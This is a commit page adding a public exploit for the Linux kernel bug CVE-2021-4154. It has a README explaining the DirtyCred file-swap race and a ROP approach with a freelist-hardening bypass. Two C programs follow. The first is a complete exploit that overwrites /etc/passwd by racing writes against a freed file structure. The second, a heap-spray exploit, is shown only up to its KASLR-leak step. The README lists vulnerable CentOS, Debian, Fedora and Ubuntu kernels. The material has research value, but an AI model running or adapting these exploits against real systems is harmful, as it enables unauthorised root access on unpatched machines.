Add vulnerability CVE-2021-4154

Youssef 2023-03-10 18:04:14 +08:00 committed by Re3et
parent f592e883d5
commit f385d25869
6 changed files with 1345 additions and 0 deletions

# CVE-2021-4154
This bug was fixed in https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3b0462726e7ef281c35a7a4ae33e93ee2bc9975b
This exploit works on most pre-patch kernels for:
* CentOS 8 kernels higher than linux-4.18.0-305.el8
* Debian 11 kernels higher than 5.10.0-8
* Fedora 31/32/33 kernels higher than 5.3.7-301.fc31
* Ubuntu 18/20 kernels higher than 5.4.0-84 and 5.11.0-37.41
Please feel free to send a PR to update README if you find it could work on other kernels.

# BUG
The bug has been patched upstream, but remains unfixed in many vendors' kernels, e.g. CentOS.
Link to the upstream patch: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3b0462726e7ef281c35a7a4ae33e93ee2bc9975b
# Primitive
We can pass an arbitrary fd to `fsconfig`, and the `struct file` behind that fd will eventually be freed by the fs context once the context is closed.
So we gain an arbitrary free of a file structure. I propose two different exploitation approaches for this vulnerability. The first, by design, works across different kernel versions and architectures without **any** modification. Its limitation is that it needs to overwrite a privileged file to gain privilege; if no such file exists, e.g. in a Docker container, the approach won't work.
The second approach gives more power than the first: like traditional exploitation, it can read/write any kernel memory and execute arbitrary code. The downside is that it is not scalable; modification is needed for each kernel version.
# DirtyCred Exploitation
The first exploitation is inspired by Jann Horn's [double-put exploit](https://bugs.chromium.org/p/project-zero/issues/detail?id=808). The vulnerability being exploited is similar to the one here: we could free a file structure while having a reference to it.
Jann Horn's exploitation is brilliant. In a high-level view, it first opens an unprivileged file with write permission, then writes malicious content to it. In the time window between the permission check and the actual write, he replaces the underlying file structure with that of a privileged file (e.g. /etc/crontab, /etc/passwd), so the malicious content is written to the privileged file.
In reality, there is a large time window between checking the file's write permission and performing the write. The following code shows this: `vfs_writev` first **checks** whether the file has write permission, then prepares the I/O and **performs the write** in `do_readv_writev`.
Jann also found a way to stabilize this exploitation: he set up a userspace filesystem where the import of user data (in `rw_copy_check_uvector`) can be delayed, enlarging the window between the permission check and the write. The userspace filesystem causes a userfault in between these two operations; in the userfault handler, he triggers the vulnerability to replace the file structure. After the replacement, the malicious content is written to the privileged file reliably.
```c
ssize_t vfs_writev(struct file *file, const struct iovec __user *vec,
                   unsigned long vlen, loff_t *pos)
{
    if (!(file->f_mode & FMODE_WRITE))
        return -EBADF;
    if (!(file->f_mode & FMODE_CAN_WRITE))
        return -EINVAL;

    return do_readv_writev(WRITE, file, vec, vlen, pos);
}

static ssize_t do_readv_writev(int type, struct file *file,
                               const struct iovec __user *uvector,
                               unsigned long nr_segs, loff_t *pos)
{
    size_t tot_len;
    struct iovec iovstack[UIO_FASTIOV];
    struct iovec *iov = iovstack;
    ssize_t ret;
    io_fn_t fn;
    iov_fn_t fnv;
    iter_fn_t iter_fn;

    // userfault here
    ret = rw_copy_check_uvector(type, uvector, nr_segs,
                                ARRAY_SIZE(iovstack), iovstack, &iov);
    if (ret <= 0)
        goto out;

    tot_len = ret;
    ret = rw_verify_area(type, file, pos, tot_len);
    if (ret < 0)
        goto out;

    // perform writing
    ...
}
```
After he released his exploit, the kernel fixed this issue by moving the user-iovec import (`rw_copy_check_uvector`) ahead of the permission check:
```c
static ssize_t vfs_writev(struct file *file, const struct iovec __user *vec,
                          unsigned long vlen, loff_t *pos, rwf_t flags)
{
    struct iovec iovstack[UIO_FASTIOV];
    struct iovec *iov = iovstack;
    struct iov_iter iter;
    ssize_t ret;

    // preparing io, where kernel could be paused using userfault
    ret = import_iovec(WRITE, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
    if (ret >= 0) {
        file_start_write(file);
        ret = do_iter_write(file, &iter, pos, flags);
        file_end_write(file);
        kfree(iov);
    }
    return ret;
}

static ssize_t do_iter_write(struct file *file, struct iov_iter *iter,
                             loff_t *pos, rwf_t flags)
{
    size_t tot_len;
    ssize_t ret = 0;

    // checking permission
    if (!(file->f_mode & FMODE_WRITE))
        return -EBADF;
    if (!(file->f_mode & FMODE_CAN_WRITE))
        return -EINVAL;

    tot_len = iov_iter_count(iter);
    if (!tot_len)
        return 0;
    ret = rw_verify_area(WRITE, file, pos, tot_len);
    if (ret < 0)
        return ret;

    // performing writing
    if (file->f_op->write_iter)
        ret = do_iter_readv_writev(file, iter, pos, WRITE, flags);
    else
        ret = do_loop_readv_writev(file, iter, pos, WRITE, flags);
    if (ret > 0)
        fsnotify_modify(file);
    return ret;
}
```
Now, the procedure of writing a file is to
1. handle userspace io (where userfault could pause the kernel)
2. check the file permission
3. perform file writing
Jann's approach to stabilizing the race has thus been patched; it no longer works on recent kernels.
## New way of stabilizing
Since Jann's approach has been patched, I tried to figure out a new way to stabilize the exploitation while following the same high-level idea. Eventually, I came up with a new approach to abusing the file structure reliably without using userfaultfd. The whole procedure looks like the following:
```
Thread 1: slow write                Thread 2: cmd write                      Thread 3: exploit

__fdget_pos (no lock)               __fdget_pos (bypass lock)                       |
        |                                   |                                       |
        v                                   v                                       |
ext4_file_write_iter (lock inode)   ext4_file_write_iter (wait for lock)            |
        |                                   |                                       v
        v                                   |                         replace the file structure
  normal write                              |
        |                                   |
        v                                   |
write done, release inode lock              |
                                            v
                              get inode lock and then write
                                            |
                                            v
                                       write done
```
### Racing write
In short, we will have three threads:
Thread 1 opens a writable file performing "slow write", which writes a very large amount of data to the file.
Thread 2 opens the same file as the first thread, but it will write malicious data to it.
Thread 3 will trigger the vulnerability and replace the underlying structure. ("Replace" means freeing the file struct used by threads 1 and 2, then reclaiming its memory slot with a privileged file structure.)
### Prevent lock in __fdget_pos
```c
unsigned long __fdget_pos(unsigned int fd)
{
    unsigned long v = __fdget(fd);
    struct file *file = (struct file *)(v & ~3);

    if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
        if (file_count(file) > 1) {
            v |= FDPUT_POS_UNLOCK;
            mutex_lock(&file->f_pos_lock);
        }
    }
    return v;
}
```
In `__fdget_pos`, if the current file has the `FMODE_ATOMIC_POS` flag and a refcount greater than 1, the kernel takes `f_pos_lock` to serialize racing writes; once the file is locked, a second writer waits here before performing its write. This prevents a file from being written from multiple threads at once and losing data. In our scenario, since we open the same file in two different threads, the file will have a refcount of at least 3, so the kernel would pause in `__fdget_pos` waiting for the lock. However, this lock sits before the permission check, so blocking the kernel here cannot enlarge the window between checking and writing. As such, we need to avoid `FMODE_ATOMIC_POS` to prevent the lock in `__fdget_pos`.
```c
/* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode))
    f->f_mode |= FMODE_ATOMIC_POS;
```
In the `open` syscall, as long as the file is a regular file, `FMODE_ATOMIC_POS` is set. At first, I found that all the files we have write permission on are regular files. After searching the kernel code, I realized that a soft link file bypasses this check and therefore does not get `FMODE_ATOMIC_POS` set. With that, we can keep the kernel from getting stuck in the `__fdget_pos` function.
### Lock in ext4_file_write_iter
```c
static ssize_t
ext4_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
{
    struct inode *inode = file_inode(iocb->ki_filp);
    int o_direct = iocb->ki_flags & IOCB_DIRECT;
    int unaligned_aio = 0;
    int overwrite = 0;
    ssize_t ret;

    if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
        return -EIO;

#ifdef CONFIG_FS_DAX
    if (IS_DAX(inode))
        return ext4_dax_write_iter(iocb, from);
#endif

    if (!inode_trylock(inode)) {
        if (iocb->ki_flags & IOCB_NOWAIT)
            return -EAGAIN;
        inode_lock(inode);
    }
    ...
}
```
In `ext4_file_write_iter`, to prevent races, the kernel takes the inode lock: if one thread is writing a file and a second thread writes to the same file, the second write is paused until the inode lock is released. The good news is that this lock sits between the permission check and the actual write.
So the idea is: in the 1st thread, we write a large amount of data to the file, which holds the inode lock for a long period. In the 2nd thread, we write to the same file; having made sure the kernel does not get stuck in `__fdget_pos`, it proceeds to `ext4_file_write_iter` and waits for the inode lock. At this point, we trigger the vulnerability and replace the file structure used by thread 2 with a privileged file. When the 2nd thread gets the lock, it writes the malicious content that we control into the privileged file.
This technique is simple, and it relies only on functionality available in the default kernel configuration. I have attached the exploit I wrote using this method; it works on any architecture and any kernel version as long as the kernel is vulnerable.
# ROP exploitation
Tl;dr,
1. Cross cache to corrupt memory from `file` object to `msg_msg`.
2. FREELIST_HARDENED could be bypassed, as I described [before](https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game). Current freelist hardening is weak.
3. Use `pipe_buffer` as an **elastic** object to bypass kaslr and hijack kernel execution.
## Cross Cache
The cross-cache technique is simple. To cross out of the `filp` cache, I open a lot of files and then free a bunch of them, which frees whole slab pages of the `filp` cache. I then spray `msg_msg` objects to reclaim the freed `filp` pages. One thing to be careful about: using a spray object whose slab cache has the same page size as the `filp` cache improves reliability.
## Bypass Freelist Hardened
Most people believe that bypassing freelist hardening requires leaking both an xor'ed freelist pointer and a heap address, so that attackers can recover the magic value (I have seen this claim in many academic papers). In reality, however, we can leak the magic without knowing any heap address, and we can even derive a heap address from an xor'ed freelist pointer.
```c
static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
    unsigned long freeptr_addr = (unsigned long)object + s->offset;

#ifdef CONFIG_SLAB_FREELIST_HARDENED
    BUG_ON(object == fp); /* naive detection of double free or corruption */
#endif
    *(void **)freeptr_addr = freelist_ptr(s, fp, freeptr_addr);
}
```
The weakness in freelist hardening is that if the current freelist pointer is 0, i.e. no object is on the freelist, the `fp` here will be 0 as well. As such, the xor'ed freelist pointer will be
```
magic_value ^ 0
```
which is the magic value itself. Leaking this value easily bypasses the freelist hardening.
In my exploitation, after crossing the cache, I free the file structure through the vulnerability again, which leaves the xor'ed value on the heap, where it can be read back as msg content from userspace.
### Leak heap address
Since we have the magic value, I perform the following operations to get a heap address:
1. reclaim the object (obj_A) freed by the vulnerability.
2. free an object (obj_B) in the same cache, and then free the obj_A again.
After this, the freelist pointer in obj_A will be
```
address_of_obj_B ^ magic_value
```
Leaking the content of obj_A then gives me the heap address of obj_B.
## Elastic object to bypass kaslr and hijack kernel execution
In [Andy's write-up](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html), he utilized `struct pipe_buffer` to bypass kaslr and hijack execution. However, the normal allocation of `struct pipe_buffer` goes to kmalloc-1k, which doesn't fit our scenario: we are working in kmalloc-512.
An [elastic object](https://zplin.me/papers/ELOISE.pdf) is one that can be allocated into any general-purpose kernel cache, depending on user input.
`struct pipe_buffer` can be an elastic object, as the following code shows:
```c
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
    struct pipe_buffer *bufs;
    unsigned int head, tail, mask, n;

    /*
     * We can shrink the pipe, if arg is greater than the ring occupancy.
     * Since we don't expect a lot of shrink+grow operations, just free and
     * allocate again like we would do for growing. If the pipe currently
     * contains more buffers than arg, then return busy.
     */
    mask = pipe->ring_size - 1;
    head = pipe->head;
    tail = pipe->tail;
    n = pipe_occupancy(pipe->head, pipe->tail);
    if (nr_slots < n)
        return -EBUSY;

    bufs = kcalloc(nr_slots, sizeof(*bufs),
                   GFP_KERNEL_ACCOUNT | __GFP_NOWARN);
    if (unlikely(!bufs))
        return -ENOMEM;
    ...
}
```
It turns out that `nr_slots` can be controlled by the user through the `fcntl` syscall (`F_SETPIPE_SZ`): by specifying a suitable value, the user places the `pipe_buffer` array in the desired cache. In my case, I used 0x8 and 0xa slots. This is useful because the property exists in both Android and generic kernels; how to use `pipe_buffer` to leak kaslr and hijack kernel execution is covered in Andy's write-up.
## ROP
The ROP part shares a lot of similarities with [Andy's write-up](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html).

#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <assert.h>
#include <pthread.h>
#include <sys/uio.h>
#include <linux/bpf.h>
#include <linux/kcmp.h>
#include <linux/capability.h>
static void die(const char *fmt, ...) {
va_list params;
va_start(params, fmt);
vfprintf(stderr, fmt, params);
va_end(params);
exit(1);
}
static void use_temporary_dir(void) {
system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
char *tmpdir = "exp_dir";
if (!tmpdir)
exit(1);
if (chmod(tmpdir, 0777))
exit(1);
if (chdir(tmpdir))
exit(1);
}
static bool write_file(const char *file, const char *what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
int err = errno;
close(fd);
errno = err;
return false;
}
close(fd);
return true;
}
static void setup_common() {
if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) {
}
}
static void loop();
static void sandbox_common() {
prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
setsid();
struct rlimit rlim;
rlim.rlim_cur = rlim.rlim_max = (200 << 20);
setrlimit(RLIMIT_AS, &rlim);
rlim.rlim_cur = rlim.rlim_max = 32 << 20;
setrlimit(RLIMIT_MEMLOCK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 136 << 20;
setrlimit(RLIMIT_FSIZE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 1 << 20;
setrlimit(RLIMIT_STACK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 0;
setrlimit(RLIMIT_CORE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 256;
setrlimit(RLIMIT_NOFILE, &rlim);
if (unshare(CLONE_NEWNS)) {
}
if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
}
if (unshare(CLONE_NEWIPC)) {
}
if (unshare(0x02000000)) {
}
if (unshare(CLONE_NEWUTS)) {
}
if (unshare(CLONE_SYSVSEM)) {
}
typedef struct {
const char *name;
const char *value;
} sysctl_t;
static const sysctl_t sysctls[] = {
{"/proc/sys/kernel/shmmax", "16777216"},
{"/proc/sys/kernel/shmall", "536870912"},
{"/proc/sys/kernel/shmmni", "1024"},
{"/proc/sys/kernel/msgmax", "8192"},
{"/proc/sys/kernel/msgmni", "1024"},
{"/proc/sys/kernel/msgmnb", "1024"},
{"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
};
unsigned i;
for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
write_file(sysctls[i].name, sysctls[i].value);
}
static int wait_for_loop(int pid) {
if (pid < 0)
exit(1);
int status = 0;
while (waitpid(-1, &status, __WALL) != pid) {
}
return WEXITSTATUS(status);
}
static void drop_caps(void) {
struct __user_cap_header_struct cap_hdr = {};
struct __user_cap_data_struct cap_data[2] = {};
cap_hdr.version = _LINUX_CAPABILITY_VERSION_3;
cap_hdr.pid = getpid();
if (syscall(SYS_capget, &cap_hdr, &cap_data))
exit(1);
const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE);
cap_data[0].effective &= ~drop;
cap_data[0].permitted &= ~drop;
cap_data[0].inheritable &= ~drop;
if (syscall(SYS_capset, &cap_hdr, &cap_data))
exit(1);
}
static int real_uid;
static int real_gid;
__attribute__((aligned(64 << 10))) static char sandbox_stack[1 << 20];
static int namespace_sandbox_proc() {
sandbox_common();
loop();
return 0;
}
static int do_sandbox_namespace() {
setup_common();
real_uid = getuid();
real_gid = getgid();
mprotect(sandbox_stack, 4096, PROT_NONE);
while (1) {
int pid =
clone(namespace_sandbox_proc, &sandbox_stack[sizeof(sandbox_stack) - 64],
CLONE_NEWUSER | CLONE_NEWPID, 0);
int ret_status = wait_for_loop(pid);
if (ret_status == 0) {
printf("[!] succeed\n");
sleep(1);
printf("[*] checking /etc/passwd\n\n");
printf("[*] executing command : head -n 5 /etc/passwd\n");
sleep(1);
system("head -n 5 /etc/passwd");
return 1;
} else {
printf("[-] failed to write, retry...\n\n");
sleep(3);
}
}
}
// ===========================
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define MAX_FILE_NUM 1000
int uaf_fd;
int fds[MAX_FILE_NUM];
int run_write = 0;
int run_spray = 0;
char *cwd;
void *slow_write() {
printf("[*] start slow write to get the lock\n");
int fd = open("./uaf", 1);
if (fd < 0) {
perror("error open uaf file");
exit(-1);
}
unsigned long int addr = 0x30000000;
int offset;
for (offset = 0; offset < 0x80000; offset++) {
void *r = mmap((void *)(addr + offset * 0x1000), 0x1000,
PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
if (r == MAP_FAILED) {
printf("allocate failed at 0x%x\n", offset);
}
}
assert(offset > 0);
void *mem = (void *)(addr);
memcpy(mem, "hhhhh", 5);
struct iovec iov[5];
for (int i = 0; i < 5; i++) {
iov[i].iov_base = mem;
iov[i].iov_len = (offset - 1) * 0x1000;
}
run_write = 1;
if (writev(fd, iov, 5) < 0) {
perror("slow write");
}
printf("[*] write done!\n");
return NULL;
}
void *write_cmd() {
char data[1024] = "\nDirtyCred works!\n\n";
struct iovec iov = {.iov_base = data, .iov_len = strlen(data)};
while (!run_write) {
}
run_spray = 1;
if (writev(uaf_fd, &iov, 1) < 0) {
printf("failed to write\n");
}
printf("[*] overwrite done! It should be after the slow write\n");
return NULL;
}
int spray_files() {
while (!run_spray) {
}
int found = 0;
printf("[*] got uaf fd %d, start spray....\n", uaf_fd);
for (int i = 0; i < MAX_FILE_NUM; i++) {
fds[i] = open("/etc/passwd", O_RDONLY);
if (fds[i] < 0) {
perror("open file");
printf("%d\n", i);
}
if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, fds[i]) ==
0) {
found = 1;
printf("[!] found, file id %d\n", i);
for (int j = 0; j < i; j++)
close(fds[j]);
break;
}
}
if (found) {
sleep(4);
return 0;
}
return -1;
}
void trigger() {
int fs_fd = syscall(__NR_fsopen, "cgroup", 0);
if (fs_fd < 0) {
perror("fsopen");
die("");
}
symlink("./data", "./uaf");
uaf_fd = open("./uaf", 1);
if (uaf_fd < 0) {
die("failed to open symbolic file\n");
}
if (syscall(__NR_fsconfig, fs_fd, 5, "source", 0, uaf_fd)) {
perror("fsconfig");
exit(-1);
}
// free the uaf fd
close(fs_fd);
}
void loop() {
trigger();
pthread_t p_id;
pthread_create(&p_id, NULL, slow_write, NULL);
pthread_t p_id_cmd;
pthread_create(&p_id_cmd, NULL, write_cmd, NULL);
exit(spray_files());
}
int main(void) {
cwd = get_current_dir_name();
syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
use_temporary_dir();
do_sandbox_namespace();
return 0;
}

#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <assert.h>
#include <pthread.h>
#include <sys/uio.h>
#include <x86intrin.h>
#include <err.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <linux/capability.h>
void DumpHex(const void *data, size_t size) {
char ascii[17];
size_t i, j;
ascii[16] = '\0';
for (i = 0; i < size; ++i) {
printf("%02X ", ((unsigned char *)data)[i]);
if (((unsigned char *)data)[i] >= ' ' &&
((unsigned char *)data)[i] <= '~') {
ascii[i % 16] = ((unsigned char *)data)[i];
} else {
ascii[i % 16] = '.';
}
if ((i + 1) % 8 == 0 || i + 1 == size) {
printf(" ");
if ((i + 1) % 16 == 0) {
printf("| %s \n", ascii);
} else if (i + 1 == size) {
ascii[(i + 1) % 16] = '\0';
if ((i + 1) % 16 <= 8) {
printf(" ");
}
for (j = (i + 1) % 16; j < 16; ++j) {
printf(" ");
}
printf("| %s \n", ascii);
}
}
}
}
void pin_on_cpu(int cpu) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(cpu, &cpu_set);
if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) {
perror("sched_setaffinity()");
exit(EXIT_FAILURE);
}
usleep(1000);
}
static void die(const char *fmt, ...) {
va_list params;
va_start(params, fmt);
vfprintf(stderr, fmt, params);
va_end(params);
exit(1);
}
static void use_temporary_dir(void) {
system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data;");
char *tmpdir = "exp_dir";
if (!tmpdir)
exit(1);
if (chmod(tmpdir, 0777))
exit(1);
if (chdir(tmpdir))
exit(1);
}
static bool write_file(const char *file, const char *what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
int err = errno;
close(fd);
errno = err;
return false;
}
close(fd);
return true;
}
static void setup_common() {
if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) {
}
}
static void loop();
static void sandbox_common() {
prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
setsid();
struct rlimit rlim;
rlim.rlim_cur = rlim.rlim_max = (200 << 20);
setrlimit(RLIMIT_AS, &rlim);
rlim.rlim_cur = rlim.rlim_max = 32 << 20;
setrlimit(RLIMIT_MEMLOCK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 136 << 20;
setrlimit(RLIMIT_FSIZE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 1 << 20;
setrlimit(RLIMIT_STACK, &rlim);
rlim.rlim_cur = rlim.rlim_max = 0;
setrlimit(RLIMIT_CORE, &rlim);
rlim.rlim_cur = rlim.rlim_max = 0x8000;
setrlimit(RLIMIT_NOFILE, &rlim);
if (unshare(CLONE_NEWNS)) {
}
typedef struct {
const char *name;
const char *value;
} sysctl_t;
static const sysctl_t sysctls[] = {
{"/proc/sys/kernel/shmmax", "16777216"},
{"/proc/sys/kernel/shmall", "536870912"},
{"/proc/sys/kernel/shmmni", "1024"},
{"/proc/sys/kernel/msgmax", "0x8000"},
{"/proc/sys/kernel/msgmni", "1024"},
{"/proc/sys/kernel/msgmnb", "1024"},
{"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
};
unsigned i;
for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
write_file(sysctls[i].name, sysctls[i].value);
}
static int wait_for_loop(int pid) {
if (pid < 0)
exit(1);
int status = 0;
while (waitpid(-1, &status, __WALL) != pid) {
}
return WEXITSTATUS(status);
}
static void drop_caps(void) {
struct __user_cap_header_struct cap_hdr = {};
struct __user_cap_data_struct cap_data[2] = {};
cap_hdr.version = _LINUX_CAPABILITY_VERSION_3;
cap_hdr.pid = getpid();
if (syscall(SYS_capget, &cap_hdr, &cap_data))
exit(1);
const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE);
cap_data[0].effective &= ~drop;
cap_data[0].permitted &= ~drop;
cap_data[0].inheritable &= ~drop;
if (syscall(SYS_capset, &cap_hdr, &cap_data))
exit(1);
}
static int real_uid;
static int real_gid;
__attribute__((aligned(64 << 10))) static char sandbox_stack[1 << 20];
static void pre_exploit();
static void exploit();
void functionA () {
printf("This is functionA\n");
}
static int namespace_sandbox_proc() {
atexit(functionA);
sandbox_common();
pre_exploit();
exploit();
exit(1);
}
static int do_sandbox_namespace() {
setup_common();
real_uid = getuid();
real_gid = getgid();
mprotect(sandbox_stack, 4096, PROT_NONE);
int pid =
clone(namespace_sandbox_proc, &sandbox_stack[sizeof(sandbox_stack) - 64], CLONE_NEWUSER, 0);
return wait_for_loop(pid);
}
// ===========================
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define MAX_FILE_NUM 10000
#define MAX_MSG_SPRAY 800
#define MAX_PIPE_NUM 100
int uaf_fd;
int fs_fd_1, fs_fd_2, fs_fd_3;
unsigned long kaslr_offset;
int fds[MAX_FILE_NUM];
int msg_ids[MAX_FILE_NUM];
int pipes[2*MAX_PIPE_NUM][2];
/* spray 256 */
struct msg {
long mtype;
char data[];
};
void setup_uaf() {
fs_fd_1 = syscall(__NR_fsopen, "cgroup", 0);
if (fs_fd_1 < 0) {
perror("fsopen");
die("");
}
fs_fd_2 = syscall(__NR_fsopen, "cgroup", 0);
if (fs_fd_2 < 0) {
perror("fsopen");
die("");
}
// fs_fd_3 = syscall(__NR_fsopen, "cgroup", 0);
// if (fs_fd_3 < 0) {
// perror("fsopen");
// die("");
// }
}
void set_uaffd() {
if (uaf_fd < 0) {
die("failed to open uaf file\n");
}
printf("opened uaf fd: %d\n", uaf_fd);
if (syscall(__NR_fsconfig, fs_fd_1, 5, "source", 0, uaf_fd)) {
perror("fsconfig");
exit(-1);
}
if (syscall(__NR_fsconfig, fs_fd_2, 5, "source", 0, uaf_fd)) {
perror("fsconfig");
exit(-1);
}
// if (syscall(__NR_fsconfig, fs_fd_3, 5, "source", 0, uaf_fd)) {
// perror("fsconfig");
// exit(-1);
// }
}
int do_exp(void) {
syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul);
syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul);
do_sandbox_namespace();
return 0;
}
static void pre_exploit() {
struct rlimit old_lim;
// pin_on_cpu(0);
if(getrlimit(RLIMIT_NOFILE, &old_lim) == 0)
printf("Old limits -> soft limit= %ld \t"
" hard limit= %ld \n", old_lim.rlim_cur,
old_lim.rlim_max);
for (int i=0; i<MAX_MSG_SPRAY+200; i++) {
msg_ids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
if (msg_ids[i] < 0) {
err(1, "msgget");
}
}
int pid = fork();
if (pid<0) err(1, "fork");
if (pid) {
while(1) {
sleep(1000000);
}
}
for (int i=0; i<2*MAX_PIPE_NUM; i++) {
if (pipe(pipes[i]) < 0) {
err(1, "pipe");
}
}
}
void msg_recv(int msqid, int msg_type, char *data, size_t size) {
if(msgrcv(msqid, data, size, msg_type, MSG_NOERROR | IPC_NOWAIT | MSG_COPY) < 0) {
perror("msgrcv");
exit(-1);
}
}
void msg_free(int msqid, int msg_type, char *data, size_t size) {
if(msgrcv(msqid, data, size, msg_type, 0) < 0) {
perror("msgrcv");
}
}
void vsleep(int n) {
while(n--) {
printf("sleep %d\n", n+1);
sleep(1);
}
}
static void exploit() {
char data[0x2000] = {};
struct msg *m = (struct msg*)data;
int time;
m->mtype = 1;
pin_on_cpu(3);
// step 1: prepare uaf context
setup_uaf();
// step 2: spray files, including uaf file
printf("spraying files\n");
// defragment
for (int i=0; i<MAX_FILE_NUM/2; i++) {
fds[i] = open("./data", O_RDONLY);
if (fds[i] < 0) {
err(1, "open data");
}
}
uaf_fd = open("./data", O_RDONLY);
// slab size for file : 0x1000
// 0x1000/0x140 = 12
for (int i=0; i<MAX_FILE_NUM/2; i++) {
fds[MAX_FILE_NUM/2+i] = open("./data", O_RDONLY);
if (fds[MAX_FILE_NUM/2+i] < 0) {
err(1, "open data 2");
}
}
set_uaffd();
printf("start free files\n");
// step 3: free files, should free the file slab
// make sure we will free a least one slab page
close(uaf_fd); // remove the uaf fd to prevent crash
for (int i=0; i<400; i++) {
close(fds[MAX_FILE_NUM/2-200+i]);
}
close(fs_fd_1);
sleep(1);
// step 3: spray msg 512 for 4 core cpu
for (int i=0; i<MAX_MSG_SPRAY; i++) {
memset(m->data, 'A', 0x1800);
if (msgsnd(msg_ids[i], (void *)m, 0x1000+0x200-48-8, 0) != 0) {
err(1, "msgsnd");
}
}
printf("spray msg done, now free the msg\n");
// step 4: now free the file object through fs_context
// indeed, it frees msg
close(fs_fd_2);
sleep(1);
printf("freed msg\n");
// getchar();
// sleep(3);
// getchar();
// step 5: we should be able to find the msg freed now
char leak[0x2000];
unsigned long slab_rand = 0;
int msg_id = -1;
int leak_offset = 0;
// printf("now leaking...\n");
for (int j=0; j<MAX_MSG_SPRAY; j++) {
// printf("%d\n", j);
// vsleep(1);
memset(leak, 0, 0x2000);
// set a larger value to prevent allocate in the freed memory
msg_recv(msg_ids[j], 0, leak, 0x1400-48-8);
for (int i=0x10; i<0x1200-48-8-0x10; i+=8) {
if (*(unsigned long int*)(leak+i) != 0x4141414141414141) {
printf("we got a leak at %x\n", i);
leak_offset = i;
printf("leaked value : %lx\n", *(unsigned long int*)(leak+i));
slab_rand = *(unsigned long int*)(leak+i);
msg_id = j;
DumpHex(leak+i, 0x100);
break;
}
}
if (slab_rand) {
break;
}
}
if (!slab_rand) {
printf("no luck, try again\n");
getchar();
exit(-1);
}
printf("leak done\n");
if (leak_offset <= 0x1000) {
printf("likely to fail\n");
getchar();
exit(-1);
}
// getchar();
// step 6: now spray pipe to get a kaslr leak
